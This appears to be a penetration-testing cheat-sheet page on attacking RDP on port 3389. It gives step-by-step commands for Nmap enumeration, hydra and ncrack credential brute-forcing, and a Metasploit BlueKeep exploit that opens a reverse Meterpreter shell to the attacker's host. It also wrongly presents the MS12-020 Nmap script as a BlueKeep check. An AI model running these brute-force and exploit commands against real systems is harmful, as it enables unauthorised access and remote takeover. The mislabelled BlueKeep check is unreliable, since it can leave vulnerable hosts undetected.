LinkedInGithub
Edit

RDP 3389

RDP Enumeration and Scanning (Port 3389)

Step 1: Define the Target IP

Replace <target_ip> with the actual IP address of the target.

# Define the target IP
export TARGET_IP="192.168.1.100"

Step 2: Perform an Nmap Scan for RDP Services

Basic Scan

nmap -p 3389 -sV --script rdp-* <target_ip>

Explanation:

  • -p 3389: Specifies the RDP port.

  • -sV: Detects the service version.

  • --script rdp-*: Runs Nmap scripts related to RDP.

Common Nmap Scripts for RDP

  • rdp-enum-encryption: Enumerates supported RDP encryption methods.

  • rdp-vuln-ms12-020: Checks for MS12-020 vulnerability.

  • rdp-ntlm-info: Extracts NTLM information from the RDP service.

Example:

nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020 <target_ip>

Step 3: Test RDP Access Using Tools

Rdesktop

  1. Install rdesktop:

    sudo apt install rdesktop

  2. Connect to the RDP server:

    rdesktop <target_ip>

xFreeRDP

  1. Install xfreerdp:

    sudo apt install freerdp2-x11

  2. Connect to the RDP server:

    xfreerdp /u:<username> /p:<password> /v:<target_ip>

Step 4: Brute-Force RDP Credentials

Hydra

  1. Use hydra to brute-force RDP credentials:

    hydra -L usernames.txt -P passwords.txt -t 4 rdp://<target_ip>

Ncrack

  1. Use ncrack for credential brute-forcing:

    ncrack -vv --user <username> -P passwords.txt rdp://<target_ip>

Step 5: Exploiting RDP Vulnerabilities

BlueKeep (CVE-2019-0708)

  1. Check for BlueKeep vulnerability:

    nmap -p 3389 --script rdp-vuln-ms12-020 <target_ip>

  2. Exploit using Metasploit:

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
run

Step 6: Manual RDP Enumeration with Metasploit

  1. Launch Metasploit:

    msfconsole

  2. Use the auxiliary module for RDP login enumeration:

    use auxiliary/scanner/rdp/rdp_login
set RHOSTS <target_ip>
set USERNAME <username>
set PASSWORD <password>
run

  3. Enumerate NTLM Info:

    use auxiliary/scanner/rdp/rdp_ntlm_info
set RHOSTS <target_ip>
run

Notes

  • Default RDP credentials may be weak or guessable.

  • Document all findings during enumeration.

  • Ensure tools like hydra, ncrack, and freerdp are installed for effective scanning.

  • BlueKeep vulnerability requires specific conditions for exploitation; handle with caution.

PreviousR-Sync 873NextSMB 139,445

Last updated